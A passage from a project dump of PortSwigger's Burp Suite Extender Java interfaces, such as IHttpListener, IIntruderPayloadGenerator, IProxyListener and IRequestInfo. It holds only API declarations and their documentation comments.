Extensions can perform custom analysis or modification of 17 | * these messages by registering an HTTP listener. 18 | */ 19 | public interface IHttpListener 20 | { 21 | /** 22 | * This method is invoked when an HTTP request is about to be issued, and 23 | * when an HTTP response has been received. 24 | * 25 | * @param toolFlag A flag indicating the Burp tool that issued the request. 26 | * Burp tool flags are defined in the 27 | * IBurpExtenderCallbacks interface. 28 | * @param messageIsRequest Flags whether the method is being invoked for a 29 | * request or response. 30 | * @param messageInfo Details of the request / response to be processed. 31 | * Extensions can call the setter methods on this object to update the 32 | * current message and so modify Burp's behavior. 33 | */ 34 | void processHttpMessage( 35 | int toolFlag, 36 | boolean messageIsRequest, 37 | IHttpRequestResponse messageInfo); 38 | } 39 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IHttpRequestResponse.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpRequestResponse.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to retrieve and update details about HTTP messages. 14 | * 15 | * Note: The setter methods generally can only be used before the message 16 | * has been processed, and not in read-only contexts. The getter methods 17 | * relating to response details can only be used after the request has been 18 | * issued. 19 | */ 20 | public interface IHttpRequestResponse 21 | { 22 | /** 23 | * This method is used to retrieve the request message. 24 | * 25 | * @return The request message. 26 | */ 27 | byte[] getRequest(); 28 | 29 | /** 30 | * This method is used to update the request message. 31 | * 32 | * @param message The new request message. 33 | */ 34 | void setRequest(byte[] message); 35 | 36 | /** 37 | * This method is used to retrieve the response message. 38 | * 39 | * @return The response message. 40 | */ 41 | byte[] getResponse(); 42 | 43 | /** 44 | * This method is used to update the response message. 45 | * 46 | * @param message The new response message. 47 | */ 48 | void setResponse(byte[] message); 49 | 50 | /** 51 | * This method is used to retrieve the user-annotated comment for this item, 52 | * if applicable. 53 | * 54 | * @return The user-annotated comment for this item, or null if none is set. 55 | */ 56 | String getComment(); 57 | 58 | /** 59 | * This method is used to update the user-annotated comment for this item. 60 | * 61 | * @param comment The comment to be assigned to this item. 62 | */ 63 | void setComment(String comment); 64 | 65 | /** 66 | * This method is used to retrieve the user-annotated highlight for this 67 | * item, if applicable. 68 | * 69 | * @return The user-annotated highlight for this item, or null if none is 70 | * set. 71 | */ 72 | String getHighlight(); 73 | 74 | /** 75 | * This method is used to update the user-annotated highlight for this item. 76 | * 77 | * @param color The highlight color to be assigned to this item. Accepted 78 | * values are: red, orange, yellow, green, cyan, blue, pink, magenta, gray, 79 | * or a null String to clear any existing highlight. 80 | */ 81 | void setHighlight(String color); 82 | 83 | /** 84 | * This method is used to retrieve the HTTP service for this request / 85 | * response. 86 | * 87 | * @return An 88 | * IHttpService object containing details of the HTTP service. 89 | */ 90 | IHttpService getHttpService(); 91 | 92 | /** 93 | * This method is used to update the HTTP service for this request / 94 | * response. 95 | * 96 | * @param httpService An 97 | * IHttpService object containing details of the new HTTP 98 | * service. 99 | */ 100 | void setHttpService(IHttpService httpService); 101 | 102 | } 103 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IHttpRequestResponsePersisted.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpRequestResponsePersisted.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used for an 14 | * IHttpRequestResponse object whose request and response messages 15 | * have been saved to temporary files using 16 | * IBurpExtenderCallbacks.saveBuffersToTempFiles(). 17 | */ 18 | public interface IHttpRequestResponsePersisted extends IHttpRequestResponse 19 | { 20 | /** 21 | * This method is deprecated and no longer performs any action. 22 | */ 23 | @Deprecated 24 | void deleteTempFiles(); 25 | } 26 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IHttpRequestResponseWithMarkers.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpRequestResponseWithMarkers.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * This interface is used for an 16 | * IHttpRequestResponse object that has had markers applied. 17 | * Extensions can create instances of this interface using 18 | * IBurpExtenderCallbacks.applyMarkers(), or provide their own 19 | * implementation. Markers are used in various situations, such as specifying 20 | * Intruder payload positions, Scanner insertion points, and highlights in 21 | * Scanner issues. 22 | */ 23 | public interface IHttpRequestResponseWithMarkers extends IHttpRequestResponse 24 | { 25 | /** 26 | * This method returns the details of the request markers. 27 | * 28 | * @return A list of index pairs representing the offsets of markers for the 29 | * request message. Each item in the list is an int[2] array containing the 30 | * start and end offsets for the marker. The method may return 31 | * null if no request markers are defined. 32 | */ 33 | List getRequestMarkers(); 34 | 35 | /** 36 | * This method returns the details of the response markers. 37 | * 38 | * @return A list of index pairs representing the offsets of markers for the 39 | * response message. Each item in the list is an int[2] array containing the 40 | * start and end offsets for the marker. The method may return 41 | * null if no response markers are defined. 42 | */ 43 | List getResponseMarkers(); 44 | } 45 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IHttpService.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpService.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to provide details about an HTTP service, to which 14 | * HTTP requests can be sent. 15 | */ 16 | public interface IHttpService 17 | { 18 | /** 19 | * This method returns the hostname or IP address for the service. 20 | * 21 | * @return The hostname or IP address for the service. 22 | */ 23 | String getHost(); 24 | 25 | /** 26 | * This method returns the port number for the service. 27 | * 28 | * @return The port number for the service. 29 | */ 30 | int getPort(); 31 | 32 | /** 33 | * This method returns the protocol for the service. 34 | * 35 | * @return The protocol for the service. Expected values are "http" or 36 | * "https". 37 | */ 38 | String getProtocol(); 39 | } 40 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IInterceptedProxyMessage.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IInterceptedProxyMessage.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.net.InetAddress; 13 | 14 | /** 15 | * This interface is used to represent an HTTP message that has been intercepted 16 | * by Burp Proxy. Extensions can register an 17 | * IProxyListener to receive details of proxy messages using this 18 | * interface. * 19 | */ 20 | public interface IInterceptedProxyMessage 21 | { 22 | /** 23 | * This action causes Burp Proxy to follow the current interception rules to 24 | * determine the appropriate action to take for the message. 25 | */ 26 | int ACTION_FOLLOW_RULES = 0; 27 | /** 28 | * This action causes Burp Proxy to present the message to the user for 29 | * manual review or modification. 30 | */ 31 | int ACTION_DO_INTERCEPT = 1; 32 | /** 33 | * This action causes Burp Proxy to forward the message to the remote server 34 | * or client, without presenting it to the user. 35 | */ 36 | int ACTION_DONT_INTERCEPT = 2; 37 | /** 38 | * This action causes Burp Proxy to drop the message. 39 | */ 40 | int ACTION_DROP = 3; 41 | /** 42 | * This action causes Burp Proxy to follow the current interception rules to 43 | * determine the appropriate action to take for the message, and then make a 44 | * second call to processProxyMessage. 45 | */ 46 | int ACTION_FOLLOW_RULES_AND_REHOOK = 0x10; 47 | /** 48 | * This action causes Burp Proxy to present the message to the user for 49 | * manual review or modification, and then make a second call to 50 | * processProxyMessage. 51 | */ 52 | int ACTION_DO_INTERCEPT_AND_REHOOK = 0x11; 53 | /** 54 | * This action causes Burp Proxy to skip user interception, and then make a 55 | * second call to processProxyMessage. 56 | */ 57 | int ACTION_DONT_INTERCEPT_AND_REHOOK = 0x12; 58 | 59 | /** 60 | * This method retrieves a unique reference number for this 61 | * request/response. 62 | * 63 | * @return An identifier that is unique to a single request/response pair. 64 | * Extensions can use this to correlate details of requests and responses 65 | * and perform processing on the response message accordingly. 66 | */ 67 | int getMessageReference(); 68 | 69 | /** 70 | * This method retrieves details of the intercepted message. 71 | * 72 | * @return An IHttpRequestResponse object containing details of 73 | * the intercepted message. 74 | */ 75 | IHttpRequestResponse getMessageInfo(); 76 | 77 | /** 78 | * This method retrieves the currently defined interception action. The 79 | * default action is 80 | * ACTION_FOLLOW_RULES. If multiple proxy listeners are 81 | * registered, then other listeners may already have modified the 82 | * interception action before it reaches the current listener. This method 83 | * can be used to determine whether this has occurred. 84 | * 85 | * @return The currently defined interception action. Possible values are 86 | * defined within this interface. 87 | */ 88 | int getInterceptAction(); 89 | 90 | /** 91 | * This method is used to update the interception action. 92 | * 93 | * @param interceptAction The new interception action. Possible values are 94 | * defined within this interface. 95 | */ 96 | void setInterceptAction(int interceptAction); 97 | 98 | /** 99 | * This method retrieves the name of the Burp Proxy listener that is 100 | * processing the intercepted message. 101 | * 102 | * @return The name of the Burp Proxy listener that is processing the 103 | * intercepted message. The format is the same as that shown in the Proxy 104 | * Listeners UI - for example, "127.0.0.1:8080". 105 | */ 106 | String getListenerInterface(); 107 | 108 | /** 109 | * This method retrieves the client IP address from which the request for 110 | * the intercepted message was received. 111 | * 112 | * @return The client IP address from which the request for the intercepted 113 | * message was received. 114 | */ 115 | InetAddress getClientIpAddress(); 116 | } 117 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IIntruderAttack.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IIntruderAttack.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to hold details about an Intruder attack. 14 | */ 15 | public interface IIntruderAttack 16 | { 17 | /** 18 | * This method is used to retrieve the HTTP service for the attack. 19 | * 20 | * @return The HTTP service for the attack. 21 | */ 22 | IHttpService getHttpService(); 23 | 24 | /** 25 | * This method is used to retrieve the request template for the attack. 26 | * 27 | * @return The request template for the attack. 28 | */ 29 | byte[] getRequestTemplate(); 30 | 31 | } 32 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IIntruderPayloadGenerator.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IIntruderPayloadGenerator.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used for custom Intruder payload generators. Extensions 14 | * that have registered an 15 | * IIntruderPayloadGeneratorFactory must return a new instance of 16 | * this interface when required as part of a new Intruder attack. 17 | */ 18 | public interface IIntruderPayloadGenerator 19 | { 20 | /** 21 | * This method is used by Burp to determine whether the payload generator is 22 | * able to provide any further payloads. 23 | * 24 | * @return Extensions should return 25 | * false when all the available payloads have been used up, 26 | * otherwise 27 | * true. 28 | */ 29 | boolean hasMorePayloads(); 30 | 31 | /** 32 | * This method is used by Burp to obtain the value of the next payload. 33 | * 34 | * @param baseValue The base value of the current payload position. This 35 | * value may be 36 | * null if the concept of a base value is not applicable (e.g. 37 | * in a battering ram attack). 38 | * @return The next payload to use in the attack. 39 | */ 40 | byte[] getNextPayload(byte[] baseValue); 41 | 42 | /** 43 | * This method is used by Burp to reset the state of the payload generator 44 | * so that the next call to 45 | * getNextPayload() returns the first payload again. This 46 | * method will be invoked when an attack uses the same payload generator for 47 | * more than one payload position, for example in a sniper attack. 48 | */ 49 | void reset(); 50 | } 51 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IIntruderPayloadGeneratorFactory.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IIntruderPayloadGeneratorFactory.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerIntruderPayloadGeneratorFactory() 15 | * to register a factory for custom Intruder payloads. 16 | */ 17 | public interface IIntruderPayloadGeneratorFactory 18 | { 19 | /** 20 | * This method is used by Burp to obtain the name of the payload generator. 21 | * This will be displayed as an option within the Intruder UI when the user 22 | * selects to use extension-generated payloads. 23 | * 24 | * @return The name of the payload generator. 25 | */ 26 | String getGeneratorName(); 27 | 28 | /** 29 | * This method is used by Burp when the user starts an Intruder attack that 30 | * uses this payload generator. 31 | * 32 | * @param attack An 33 | * IIntruderAttack object that can be queried to obtain details 34 | * about the attack in which the payload generator will be used. 35 | * @return A new instance of 36 | * IIntruderPayloadGenerator that will be used to generate 37 | * payloads for the attack. 38 | */ 39 | IIntruderPayloadGenerator createNewInstance(IIntruderAttack attack); 40 | } 41 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IIntruderPayloadProcessor.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IIntruderPayloadProcessor.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerIntruderPayloadProcessor() to 15 | * register a custom Intruder payload processor. 16 | */ 17 | public interface IIntruderPayloadProcessor 18 | { 19 | /** 20 | * This method is used by Burp to obtain the name of the payload processor. 21 | * This will be displayed as an option within the Intruder UI when the user 22 | * selects to use an extension-provided payload processor. 23 | * 24 | * @return The name of the payload processor. 25 | */ 26 | String getProcessorName(); 27 | 28 | /** 29 | * This method is invoked by Burp each time the processor should be applied 30 | * to an Intruder payload. 31 | * 32 | * @param currentPayload The value of the payload to be processed. 33 | * @param originalPayload The value of the original payload prior to 34 | * processing by any already-applied processing rules. 35 | * @param baseValue The base value of the payload position, which will be 36 | * replaced with the current payload. 37 | * @return The value of the processed payload. This may be 38 | * null to indicate that the current payload should be skipped, 39 | * and the attack will move directly to the next payload. 40 | */ 41 | byte[] processPayload( 42 | byte[] currentPayload, 43 | byte[] originalPayload, 44 | byte[] baseValue); 45 | } 46 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IMenuItemHandler.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMenuItemHandler.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerMenuItem() to register a custom 15 | * context menu item. 16 | * 17 | * @deprecated Use 18 | * IContextMenuFactory instead. 19 | */ 20 | @Deprecated 21 | public interface IMenuItemHandler 22 | { 23 | /** 24 | * This method is invoked by Burp Suite when the user clicks on a custom 25 | * menu item which the extension has registered with Burp. 26 | * 27 | * @param menuItemCaption The caption of the menu item which was clicked. 28 | * This parameter enables extensions to provide a single implementation 29 | * which handles multiple different menu items. 30 | * @param messageInfo Details of the HTTP message(s) for which the context 31 | * menu was displayed. 32 | */ 33 | void menuItemClicked( 34 | String menuItemCaption, 35 | IHttpRequestResponse[] messageInfo); 36 | } 37 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IMessageEditor.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMessageEditor.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.Component; 13 | 14 | /** 15 | * This interface is used to provide extensions with an instance of Burp's HTTP 16 | * message editor, for the extension to use in its own UI. Extensions should 17 | * call IBurpExtenderCallbacks.createMessageEditor() to obtain an 18 | * instance of this interface. 19 | */ 20 | public interface IMessageEditor 21 | { 22 | 23 | /** 24 | * This method returns the UI component of the editor, for extensions to add 25 | * to their own UI. 26 | * 27 | * @return The UI component of the editor. 28 | */ 29 | Component getComponent(); 30 | 31 | /** 32 | * This method is used to display an HTTP message in the editor. 33 | * 34 | * @param message The HTTP message to be displayed. 35 | * @param isRequest Flags whether the message is an HTTP request or 36 | * response. 37 | */ 38 | void setMessage(byte[] message, boolean isRequest); 39 | 40 | /** 41 | * This method is used to retrieve the currently displayed message, which 42 | * may have been modified by the user. 43 | * 44 | * @return The currently displayed HTTP message. 45 | */ 46 | byte[] getMessage(); 47 | 48 | /** 49 | * This method is used to determine whether the current message has been 50 | * modified by the user. 51 | * 52 | * @return An indication of whether the current message has been modified by 53 | * the user since it was first displayed. 54 | */ 55 | boolean isMessageModified(); 56 | 57 | /** 58 | * This method returns the data that is currently selected by the user. 59 | * 60 | * @return The data that is currently selected by the user, or 61 | * null if no selection is made. 62 | */ 63 | byte[] getSelectedData(); 64 | 65 | /** 66 | * This method can be used to retrieve the bounds of the user's selection 67 | * into the displayed message, if applicable. 68 | * 69 | * @return An int[2] array containing the start and end offsets of the 70 | * user's selection within the displayed message. If the user has not made 71 | * any selection in the current message, both offsets indicate the position 72 | * of the caret within the editor. For some editor views, the concept of 73 | * selection within the message does not apply, in which case this method 74 | * returns null. 75 | */ 76 | int[] getSelectionBounds(); 77 | } 78 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IMessageEditorController.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMessageEditorController.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used by an 14 | * IMessageEditor to obtain details about the currently displayed 15 | * message. Extensions that create instances of Burp's HTTP message editor can 16 | * optionally provide an implementation of 17 | * IMessageEditorController, which the editor will invoke when it 18 | * requires further information about the current message (for example, to send 19 | * it to another Burp tool). Extensions that provide custom editor tabs via an 20 | * IMessageEditorTabFactory will receive a reference to an 21 | * IMessageEditorController object for each tab instance they 22 | * generate, which the tab can invoke if it requires further information about 23 | * the current message. 24 | */ 25 | public interface IMessageEditorController 26 | { 27 | /** 28 | * This method is used to retrieve the HTTP service for the current message. 29 | * 30 | * @return The HTTP service for the current message. 31 | */ 32 | IHttpService getHttpService(); 33 | 34 | /** 35 | * This method is used to retrieve the HTTP request associated with the 36 | * current message (which may itself be a response). 37 | * 38 | * @return The HTTP request associated with the current message. 39 | */ 40 | byte[] getRequest(); 41 | 42 | /** 43 | * This method is used to retrieve the HTTP response associated with the 44 | * current message (which may itself be a request). 45 | * 46 | * @return The HTTP response associated with the current message. 47 | */ 48 | byte[] getResponse(); 49 | } 50 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IMessageEditorTab.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMessageEditorTab.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.Component; 13 | 14 | /** 15 | * Extensions that register an 16 | * IMessageEditorTabFactory must return instances of this 17 | * interface, which Burp will use to create custom tabs within its HTTP message 18 | * editors. 19 | */ 20 | public interface IMessageEditorTab 21 | { 22 | /** 23 | * This method returns the caption that should appear on the custom tab when 24 | * it is displayed. Note: Burp invokes this method once when the tab 25 | * is first generated, and the same caption will be used every time the tab 26 | * is displayed. 27 | * 28 | * @return The caption that should appear on the custom tab when it is 29 | * displayed. 30 | */ 31 | String getTabCaption(); 32 | 33 | /** 34 | * This method returns the component that should be used as the contents of 35 | * the custom tab when it is displayed. Note: Burp invokes this 36 | * method once when the tab is first generated, and the same component will 37 | * be used every time the tab is displayed. 38 | * 39 | * @return The component that should be used as the contents of the custom 40 | * tab when it is displayed. 41 | */ 42 | Component getUiComponent(); 43 | 44 | /** 45 | * The hosting editor will invoke this method before it displays a new HTTP 46 | * message, so that the custom tab can indicate whether it should be enabled 47 | * for that message. 48 | * 49 | * @param content The message that is about to be displayed, or a zero-length 50 | * array if the existing message is to be cleared. 51 | * @param isRequest Indicates whether the message is a request or a 52 | * response. 53 | * @return The method should return 54 | * true if the custom tab is able to handle the specified 55 | * message, and so will be displayed within the editor. Otherwise, the tab 56 | * will be hidden while this message is displayed. 57 | */ 58 | boolean isEnabled(byte[] content, boolean isRequest); 59 | 60 | /** 61 | * The hosting editor will invoke this method to display a new message or to 62 | * clear the existing message. This method will only be called with a new 63 | * message if the tab has already returned 64 | * true to a call to 65 | * isEnabled() with the same message details. 66 | * 67 | * @param content The message that is to be displayed, or 68 | * null if the tab should clear its contents and disable any 69 | * editable controls. 70 | * @param isRequest Indicates whether the message is a request or a 71 | * response. 72 | */ 73 | void setMessage(byte[] content, boolean isRequest); 74 | 75 | /** 76 | * This method returns the currently displayed message. 77 | * 78 | * @return The currently displayed message. 79 | */ 80 | byte[] getMessage(); 81 | 82 | /** 83 | * This method is used to determine whether the currently displayed message 84 | * has been modified by the user. The hosting editor will always call 85 | * getMessage() before calling this method, so any pending 86 | * edits should be completed within 87 | * getMessage(). 88 | * 89 | * @return The method should return 90 | * true if the user has modified the current message since it 91 | * was first displayed. 92 | */ 93 | boolean isModified(); 94 | 95 | /** 96 | * This method is used to retrieve the data that is currently selected by 97 | * the user. 98 | * 99 | * @return The data that is currently selected by the user. This may be 100 | * null if no selection is currently made. 101 | */ 102 | byte[] getSelectedData(); 103 | } 104 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IMessageEditorTabFactory.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMessageEditorTabFactory.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerMessageEditorTabFactory() to 15 | * register a factory for custom message editor tabs. This allows extensions to 16 | * provide custom rendering or editing of HTTP messages, within Burp's own HTTP 17 | * editor. 18 | */ 19 | public interface IMessageEditorTabFactory 20 | { 21 | /** 22 | * Burp will call this method once for each HTTP message editor, and the 23 | * factory should provide a new instance of an 24 | * IMessageEditorTab object. 25 | * 26 | * @param controller An 27 | * IMessageEditorController object, which the new tab can query 28 | * to retrieve details about the currently displayed message. This may be 29 | * null for extension-invoked message editors where the 30 | * extension has not provided an editor controller. 31 | * @param editable Indicates whether the hosting editor is editable or 32 | * read-only. 33 | * @return A new 34 | * IMessageEditorTab object for use within the message editor. 35 | */ 36 | IMessageEditorTab createNewInstance( 37 | IMessageEditorController controller, 38 | boolean editable); 39 | } 40 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IParameter.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IParameter.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to hold details about an HTTP request parameter. 14 | */ 15 | public interface IParameter 16 | { 17 | /** 18 | * Used to indicate a parameter within the URL query string. 19 | */ 20 | byte PARAM_URL = 0; 21 | /** 22 | * Used to indicate a parameter within the message body. 23 | */ 24 | byte PARAM_BODY = 1; 25 | /** 26 | * Used to indicate an HTTP cookie. 27 | */ 28 | byte PARAM_COOKIE = 2; 29 | /** 30 | * Used to indicate an item of data within an XML structure. 31 | */ 32 | byte PARAM_XML = 3; 33 | /** 34 | * Used to indicate the value of a tag attribute within an XML structure. 35 | */ 36 | byte PARAM_XML_ATTR = 4; 37 | /** 38 | * Used to indicate the value of a parameter attribute within a multi-part 39 | * message body (such as the name of an uploaded file). 40 | */ 41 | byte PARAM_MULTIPART_ATTR = 5; 42 | /** 43 | * Used to indicate an item of data within a JSON structure. 44 | */ 45 | byte PARAM_JSON = 6; 46 | 47 | /** 48 | * This method is used to retrieve the parameter type. 49 | * 50 | * @return The parameter type. The available types are defined within this 51 | * interface. 52 | */ 53 | byte getType(); 54 | 55 | /** 56 | * This method is used to retrieve the parameter name. 57 | * 58 | * @return The parameter name. 59 | */ 60 | String getName(); 61 | 62 | /** 63 | * This method is used to retrieve the parameter value. 64 | * 65 | * @return The parameter value. 66 | */ 67 | String getValue(); 68 | 69 | /** 70 | * This method is used to retrieve the start offset of the parameter name 71 | * within the HTTP request. 72 | * 73 | * @return The start offset of the parameter name within the HTTP request, 74 | * or -1 if the parameter is not associated with a specific request. 75 | */ 76 | int getNameStart(); 77 | 78 | /** 79 | * This method is used to retrieve the end offset of the parameter name 80 | * within the HTTP request. 81 | * 82 | * @return The end offset of the parameter name within the HTTP request, or 83 | * -1 if the parameter is not associated with a specific request. 84 | */ 85 | int getNameEnd(); 86 | 87 | /** 88 | * This method is used to retrieve the start offset of the parameter value 89 | * within the HTTP request. 90 | * 91 | * @return The start offset of the parameter value within the HTTP request, 92 | * or -1 if the parameter is not associated with a specific request. 93 | */ 94 | int getValueStart(); 95 | 96 | /** 97 | * This method is used to retrieve the end offset of the parameter value 98 | * within the HTTP request. 99 | * 100 | * @return The end offset of the parameter value within the HTTP request, or 101 | * -1 if the parameter is not associated with a specific request. 102 | */ 103 | int getValueEnd(); 104 | } 105 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IProxyListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IProxyListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerProxyListener() to register a 15 | * Proxy listener. The listener will be notified of requests and responses being 16 | * processed by the Proxy tool. Extensions can perform custom analysis or 17 | * modification of these messages, and control in-UI message interception, by 18 | * registering a proxy listener. 19 | */ 20 | public interface IProxyListener 21 | { 22 | /** 23 | * This method is invoked when an HTTP message is being processed by the 24 | * Proxy. 25 | * 26 | * @param messageIsRequest Indicates whether the HTTP message is a request 27 | * or a response. 28 | * @param message An 29 | * IInterceptedProxyMessage object that extensions can use to 30 | * query and update details of the message, and control whether the message 31 | * should be intercepted and displayed to the user for manual review or 32 | * modification. 33 | */ 34 | void processProxyMessage( 35 | boolean messageIsRequest, 36 | IInterceptedProxyMessage message); 37 | } 38 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IRequestInfo.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IRequestInfo.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.net.URL; 13 | import java.util.List; 14 | 15 | /** 16 | * This interface is used to retrieve key details about an HTTP request. 17 | * Extensions can obtain an 18 | * IRequestInfo object for a given request by calling 19 | * IExtensionHelpers.analyzeRequest(). 20 | */ 21 | public interface IRequestInfo 22 | { 23 | /** 24 | * Used to indicate that there is no content. 25 | */ 26 | byte CONTENT_TYPE_NONE = 0; 27 | /** 28 | * Used to indicate URL-encoded content. 29 | */ 30 | byte CONTENT_TYPE_URL_ENCODED = 1; 31 | /** 32 | * Used to indicate multi-part content. 33 | */ 34 | byte CONTENT_TYPE_MULTIPART = 2; 35 | /** 36 | * Used to indicate XML content. 37 | */ 38 | byte CONTENT_TYPE_XML = 3; 39 | /** 40 | * Used to indicate JSON content. 41 | */ 42 | byte CONTENT_TYPE_JSON = 4; 43 | /** 44 | * Used to indicate AMF content. 45 | */ 46 | byte CONTENT_TYPE_AMF = 5; 47 | /** 48 | * Used to indicate unknown content. 49 | */ 50 | byte CONTENT_TYPE_UNKNOWN = -1; 51 | 52 | /** 53 | * This method is used to obtain the HTTP method used in the request. 54 | * 55 | * @return The HTTP method used in the request. 56 | */ 57 | String getMethod(); 58 | 59 | /** 60 | * This method is used to obtain the URL in the request. 61 | * 62 | * @return The URL in the request. 63 | */ 64 | URL getUrl(); 65 | 66 | /** 67 | * This method is used to obtain the HTTP headers contained in the request. 68 | * 69 | * @return The HTTP headers contained in the request. 70 | */ 71 | List getHeaders(); 72 | 73 | /** 74 | * This method is used to obtain the parameters contained in the request. 75 | * 76 | * @return The parameters contained in the request. 77 | */ 78 | List getParameters(); 79 | 80 | /** 81 | * This method is used to obtain the offset within the request where the 82 | * message body begins. 83 | * 84 | * @return The offset within the request where the message body begins. 85 | */ 86 | int getBodyOffset(); 87 | 88 | /** 89 | * This method is used to obtain the content type of the message body. 90 | * 91 | * @return An indication of the content type of the message body. Available 92 | * types are defined within this interface. 93 | */ 94 | 